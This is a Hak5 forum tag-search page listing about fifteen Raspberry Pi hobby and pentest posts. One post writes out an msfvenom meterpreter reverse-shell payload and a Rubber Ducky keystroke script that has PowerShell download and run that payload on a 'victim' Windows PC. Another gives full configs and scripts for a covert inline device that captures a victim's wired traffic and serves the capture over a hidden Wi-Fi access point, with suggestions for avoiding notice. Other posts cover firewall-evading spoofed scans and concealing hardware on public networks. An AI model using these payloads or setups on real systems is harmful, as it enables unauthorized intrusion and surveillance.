Jump to content

Search the Community

Showing results for tags 'raspberry pi'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hi all, I have a Raspberry Pi 3 with an Alfa AWUS036H with 7dBi directional antenna set up in a vehicle. I'm wondering what the best method of controlling the Pi in a (not very roomy) vehicle would be? I've considered; A Chromebook, chrooted and connected via SSH or Ethernet cable (a little too bulky, as I can't easily put a laptop on my lap in the vehicle) A small dashboard monitor and bluetooth keyboard A Raspberry Pi Touchscreen A keyboard/case combo thing like this Some way of connecting an Android phone to it What would you go for and why?
  2. Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!
  3. Hi all, How would you go about setting up a stand-alone Raspberry Pi, which would; Be powered by solar, battery, or any other method. At least a few days power, if possible. Have some sort of internet connection available, so one can SSH / NetCat to it. (Dongle?) Be as small and discreet as possible, so it doesn't get stolen. *edit* Think weather monitoring station, but too far away to connect to the same WiFi network as your home PC, and not in range of any free WiFi hotspots.
  4. Hello all, so got an idea, looked in the forums didn’t really find anything really related to this, thought ı would share it and ask for help :) where did this come from?: -shipping cost of pineapple to my location is 204USD -rpi has better harware spec (which is good when ur programming skills are a bit rough like mine) -u can add touchscreen to rpi Hardware Setbacks: rpi doesn't have pins to set a mode, unlike pineapple | possible solution, using the gpio on RPI Current stat: -someone shared the mkv4 ui online with in 2 days ı was able to get most of the UI working :) -ordered a couple of usb-wlan card, will test how they will work (rpi doesn like them all) -did try frutyfy, didnt really like it :/ Goal: (hardware) hardware: RPI2 os: Kali ( if kali v2 for gets released by august 7 for pi will continue with that) screens/panels: rgb lcd and 5inc tft support Network: 2 wifi cards, 1 Ethernet Where I need support: the source of mkv5 UI ( the github is empty) some coding in the gui (for the tft screen) possibly help on making the ui for on RPI Goal: (software) UI: pineapple :) multiple boot options: -wireless router (tor/vpn/normal) -plug to see network info (ip/subnet/dns, outgoing ports) needs screen and an online server -vpn gate way (plug the cable in, connect from home) future updates: adding media center functions to disguise the evil inside, so you can plug it to a tv it will work like a media center but will be a pentest box in the back :) open to any ideas/ resources etc
  5. Hi every one, I have a Windows XP system with ZoneAlarm firewall installed. I have 2 raspberry Pi computers with Nmap installed I have been attempting to use one RPI to scan the XP system but I am trying to fool ZoneAlarm into thinking the scan came from another address. So I have XP system on ZoneAlarm installed. RPI 1 on 192,168.0.13 - set as untrusted on ZoneAlarm RPI 2 on - set as trusted on ZoneAlarm I ran a decoy scan from RPI 1 to the XP system. I get the results from the scan but ZoneAlarm knows the scan came from and the IP shows up in the log. I then tried a zombie scan from RPI 1 and an error is returned from Nmap saying 'Idle scan is unable to obtain meaningful results from proxy' I have searched for the error but cannot get any meaningful result. Does the system I am using as the zombie or decoy need certain ports to be opened to allow this type of scan to work? Any help much appreciatted.
  6. Can anyone help me in making IRC website for my collage ? can i use raspberry (pi) and pineapple (mark 5) to do that? plz help me in doing that just give me instruction and i will also do my research to make that better..plz someone help me in this..... love hak5
  7. I have my raspberry pi running Piratebox (piratebox.cc).. i just want to know how to connect raspberry pi ent0 to wifi pineapple ......plz someone help me on this ..
  8. Was wondering if by chance anyone else out there was interested in using a Raspberry Pi in the same way as Pineapple. Raspberry, headless with two radios. One for Client mode to accept incomming connections and the other radio to "Attack" with. I have spent MANY hours tryng to get this config on Raspberry to work without luck.I have many distro's on Raspberry , including Kali (BackTrack) Better yet, would be nice if there was a port over to Raspberry from Pineapple. After hours of searching , actually did find someone trying to do the same thing, but it didn't work.
  9. So... This is the project I am tackling this evening! Yay. Although, I am still waiting for a viable update to Karma. Just sayin...
  10. Hi Everyone, Recently I was using Hiren's Boot CD and I discovered the MiniXP feature which has now recently revived my laptop (thank god!) and the lightweight version of the OS got me thinking... Would it be possible to install mini xp on a pi? I have already read instances of people extracting mini xp from the boot cd and making a stand-alone boot version (http://reboot.pro/topic/12138-can-i-extract-mini-xp-from-hirens-bootcd/), but I still want to see if it is possible to get it to work on a pi. If the XP works, then maybe we could even come up with a way to use Windows 7/8 Embedded or equivalent! Let me know what you think!
  11. Guest

    Pineapple Kali Pi

    UPDATE: 4/16 I already had a usb rubby ducky and thanks to the Kali-Linux install script of the Rubber Ducky Payload Generator this device now has a new attack vector granted I have access to a client station. Thanks Hak5! UPDATE: I am now running kali linux on raspberry pi I am now going to automate as much as i can To use the setup I use a tablet and vnc into it It takes about 3 minutes to power up everything, ssh into pi, startvnc and login I hooked up the AWUS036NHA to the kali pi and did a real world wifi cracking test (wifite is built into kali) I found a good spot with multiple networks and the signal strength isnt great, It took around 5 min This whole getup is very easy to setup, I will actually be able to use this within 6 months on a clients network. . This is what it all looks like all parts cost around $350 Step 1 buy stuff: Buy raspberry pi, wifipineapple, 2 alfas, usb hub, 8gb usb drive, 16gb sdcard, ethernet cable Step 2 setup pi: http://cdimage.kali.org/kali-images/kali-linux-1.0-armel-raspberrypi.img.gz Dowload and write to sdcard put in pi thats it. Step 3 setup pineapple: http://forums.hak5.org/index.php?/forum/65-mark-iv/ Step 4 power them up: Plug the KaliPi into the pineapple poe jack. KaliPi automatically tries to connect on eth0, Step 5 My pi is always assigned the address SSH in to kalipi (pw:toor) install tightvncserver. Step 6 Install raspi-config on Kali pi git clone http://github.com/asb/raspi-config.git cd raspi-config sh raspi-config Step 7: Use what the gods gave you wget wifipineapple.com/wp4.sh chmod+x wp4.sh ./wp4.sh If you have questions... pm me! I am a computer science student and just a nerd that likes to play with things This is my first post. I recently got a raspberry pi and a wifi pineapple mark iv and set them up to work together. I just got a new battery pack (anker astro3 10000mAh) and it runs the two of them, it will run for close to 5 hours as pictured. I also use them with the Alfa AWUS036H (not pictured) and the AWUS036NHA. It took a little time but was not that hard. Raspberry pi instructions, Pwnpi and http://forums.hak5.org/index.php?/forum/49-jasager/ I will update as the project gets better, for now... With the raspberry pi you can make any tv or monitor your display with rca or hdmi. Or ssh and vnc into both devices from you laptop, tablet, or phone I am working on complete automation based off the fact that Karma will bring devices to the network, and the pwnpi will attack most hosts on the pineapple network Making it mobile, I thought about a pizza box but figured a solar backpack was a better bet In this pic i am using the pineapple with the Alfa AWUS036H and AWUS036NHA. I decided to use 2 power supplies: anker astro3 10000mAh to run the pineapple and an anker 8400mAh to run the pi
  12. Hi guys, I'm new so please don't bite ;) I noticed Darren's section about setting up ZNC so he has always on connectivity with IRC. I'm just wondering if it's possible to do this with a Raspberry Pi instead of using a VPS. Ideally I'd be running my 'pi' as the VPS which saves on costs for me. Does anyone know if this is possible and if so can you point me in the right direction :) Thanks guys! DarkByD3sign
  13. So after coming to grips with the fact that the 400mhz on-board isn't near enough horsepower to utilize the full potential of this little device I've decided to get a 2nd Pineapple.....or a Raspberry Pi.....or a BeagleBone Black. I'm having trouble deciding which would be the best option to get the most out of my Pineapple. I was hoping that other's that've gone down this road could help me decide. I would love to be able to run SSLStrip, URLSnarf, TCPDump, Reaver, MDK3, Aircrack, Deauth, Ettercap, WAN or 3G Connection, (Obviously Karma), and any other modules/infusions without having to pick and choose at times which features i can use without crashing my setup. I'm not even sure if any one device paired with the Pineapple would be enough to allow me to go crazy with it. I know there's a chance that the only way for me to realize this would be Pineapple + Pineapple + Raspi/BBone but I'm positive that some of the more experienced members of this forum will have a much better grasp of this than me. I know that for some of those features to run concurrent I'd at least need a 2nd external Alfa (or 6th) which I'm open to. I'm just wondering what would be the most cost/space effecient way for the Pineapple to never be left wanting for more horsepower/radios. Either way I'm pretty sure that this specific topic hasn't been covered and I think a pro's and con's list would be helpful to alot of people now and down the road. Any feedback is greatly appreciated!!! Thanks in advance...
  14. The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Heres how. Hardware: Raspberry Pi Model B 32GB SD Card Belkin 4 port powered USB hub Alfa wifi card (NHA, from the hakshop) USB Ethernet adapter (also from the hakshop) OS: Latest image of rasbian Software: All can be apt-get installed bridge-utils tcpdump hostapd fkill hostapd zd1211-firmware hostap-utils iw dnsmasq Edit /etc/network/interfaces to look like this: auto lo iface lo inet loopback iface eth0 inet dhcp iface wlan0 inet static address netmask Edit /etc/dnsmasq.conf # Never forward plain names (without a dot or domain part) domain-needed # Only listen for DHCP on wlan0 interface=wlan0 # Create a dhcp range on your /24 wlan0 network with 12 hour lease time dhcp-range=,,,12h Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden) interface=wlan0 driver=nl80211 ssid=monkey channel=1 auth_algs=1 wpa=1 wpa_psk_file=/etc/hostapd-psk wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP ignore_broadcast_ssid=1 Next Create/edit /etc/hostapd-psk 00:00:00:00:00:00 YourSuperLongAndSecurePasswd We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up. #!/bin/bash #Change settings below to match network eth_ip="" eth_netmask="" eth_broadcast="" brctl addbr mybridge brctl addif mybridge eth0 brctl addif mybridge eth1 ifconfig eth0 promisc up ifconfig eth1 promisc up ifconfig mybridge promisc up ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast tcpdump -i eth1 -w /root/cap.pcap & And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local # turn on forwarding echo 1 > /proc/sys/net/ipv4/ip_forward # enable NAT iptables -t nat -A POSTROUTING -j MASQUERADE # start the access point hostapd -B /etc/hostapd/hostapd.conf Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP. What it doesn't do: Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want. Things to add: -Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd. -Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file. -Add Jasegar functionality to the wifi AP (this ones the biggy) -Add the all important sslstrip functionality (something I've tried but can't get to work - if theres interest, I'll happily share my findings) -Add in Moriarty's awesome new UWUI So thats it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here. Long live the interceptor monkey! telot
  15. There are times you want to go to the library, or community college, and want to to see whats going on the network, or use their pipes. Below are a few Pictures of a quick case I made to hide such things from plan site. One thing is, you have to make sure you have small connectors for your cables.
  • Create New...